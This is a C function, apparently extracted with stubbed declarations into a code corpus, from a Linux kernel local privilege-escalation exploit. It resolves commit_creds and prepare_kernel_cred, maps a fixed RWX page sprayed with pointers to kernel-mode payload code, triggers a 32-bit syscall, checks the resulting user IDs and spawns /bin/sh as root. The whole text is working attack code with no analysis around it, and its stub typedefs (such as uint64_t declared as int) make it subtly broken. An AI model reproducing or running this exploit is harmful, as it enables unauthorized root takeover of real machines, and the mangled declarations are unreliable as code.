
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;
typedef scalar_t__ _prepare_kernel_cred ;
typedef scalar_t__ _commit_creds ;


 int MAP_ANONYMOUS ;
 scalar_t__ MAP_FAILED ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 scalar_t__ commit_creds ;
 int execl (char*,char*,int *) ;
 int exit (int) ;
 scalar_t__ get_symbol (char*) ;
 int getegid () ;
 int geteuid () ;
 int getgid () ;
 int getuid () ;
 scalar_t__ kernelmodecode ;
 scalar_t__ mmap (void*,int,int,int,int,int ) ;
 scalar_t__ prepare_kernel_cred ;
 int printf (char*,...) ;

__attribute__((used)) static void docall(uint64_t *ptr, uint64_t size)
{
 commit_creds = (_commit_creds) get_symbol("commit_creds");
 if (!commit_creds) {
  printf("symbol table not available, aborting!\n");
  exit(1);
 }

 prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
 if (!prepare_kernel_cred) {
  printf("symbol table not available, aborting!\n");
  exit(1);
 }

        uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

 printf("mapping at %lx\n", tmp);

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
                printf("mmap fault\n");
                exit(1);
        }

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");

        printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
        execl("/bin/sh", "bin/sh", ((void*)0));
        printf("no /bin/sh ??\n");
        exit(0);
}
